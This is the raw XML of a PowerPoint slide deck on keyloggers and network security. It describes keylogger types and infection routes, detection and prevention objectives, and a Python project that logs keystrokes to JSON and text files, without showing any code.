                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18"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280AE9-6751-A374-757B-1AC5D027EF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                 Introduction to Keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A308BE-B074-229F-53B3-9457E2E92078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1676400"/>
            <a:ext cx="73152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Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A keylogger, sometimes called a keystroke logger, is a type of surveillance technology used to monitor and record each keystroke on a specific device, such as a computer or smartphone. It can be either hardware- or software-based. The latter type is also known as system monitoring software or keyboard capture software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Types of Keyloggers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="323E48"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software keyloggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="323E48"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware keyloggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="323E48"/>
                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In this we can see about software keyloggers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="323E48"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234127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036BF-3F25-B1C7-6F6F-AABAA7480BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="685800"/>
            <a:ext cx="5867400" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What are Software Keyloggers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3EE06C-0E7B-1AF9-B662-BEE56BC340E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1371600"/>
            <a:ext cx="7467600" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A keylogging software program does not require physical access to the user's computer for installation. It can be purposefully downloaded by someone who wants to monitor activity on a particular computer, or it can be malware downloaded unwittingly by the user of the keyboard and its device, and then executed as part of a rootkit or remote administration Trojan. Either way, keylogging software allows an unauthorized threat actor to view the user's keystrokes, and then use this knowledge to access and compromise the device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In this we can see about software keylogger implemented using python language. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1997855-33F3-7F9E-CE2C-082E1912A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2492535"/>
            <a:ext cx="3657600" cy="2295718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286037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5709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7F3BC8-CA48-D1FF-7E38-FECC3E5AB055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834072" y="1358778"/>
            <a:ext cx="991965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Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keyloggers are malicious software or hardware devices that capture and record keystrokes from a computer or mobile device. They pose a significant threat to cybersecurity by enabling attackers to steal sensitive information such as passwords, financial data, and personal communications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The main problem addressed in this project is the persistent threat posed by keyloggers to network security. This encompasses several sub-problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DD3E59-8AE0-7BD4-DBAB-6B2B63CF66DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3287047"/>
            <a:ext cx="8210550" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Detection Challenges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keyloggers can be highly sophisticated, using advanced techniques to evade traditional detection mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Prevention Difficulties:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Preventing the installation of keyloggers is challenging due to multiple potential entry points, including phishing attacks, drive-by downloads, and physical access to devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mitigation and Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Once a keylogger is detected, removing it without disrupting normal operations can be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173AE-B05A-34B3-7F46-E58252CDFE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393290" y="255657"/>
            <a:ext cx="6105832" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FA45203-EB01-8C7A-E0DC-55C4C86B13B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425245" y="609600"/>
            <a:ext cx="8763000" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Develop Advanced Detection Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Create and refine algorithms for detecting both software and hardware keyloggers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Strengthen Preventive Measures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Establish robust protocols and user education programs to prevent keylogger installation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Enhance Mitigation Strategies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Develop clear, actionable response plans for keylogger incidents, ensuring swift and effective removal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BEFFED2-B5B5-0E84-7682-A5B50447F34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4114800"/>
            <a:ext cx="8382000" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Continuous evaluation and enhancement of the overall network security framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Research and development of detection and prevention technologies.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375495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4D462208-B0BF-41F2-CD4D-198D19BEF056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574266" y="1150562"/>
            <a:ext cx="8534400" cy="572464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Key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JSON and Text Log Generation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GUI</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Built using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Technical Overview</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Libraries Used</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Python,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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json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Functionality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Efficiency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26521B18-3662-1542-AAA2-9CDD6ACA85B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="8534400" cy="449580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Primary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 Professionals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Employers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Secondary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Researchers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Conduct studies on user behavior and typing patterns.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ACE2C6-0866-41B7-98DC-6C60C9059AA7}">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470</TotalTime>
  <Words>1414</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>197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Garamond</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Tarak Sri Chandrahas Lakkakula</vt:lpstr>
      <vt:lpstr>KEYLOGGER AND NETWORK SECURITY</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROJECT OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>YOUR SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>THE WOW IN YOUR SOLUTION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Prabhu Kiran Gannabathula</dc:title>
  <dc:creator>tarak</dc:creator>
  <cp:lastModifiedBy>Tarak Chandu</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T14:07:49Z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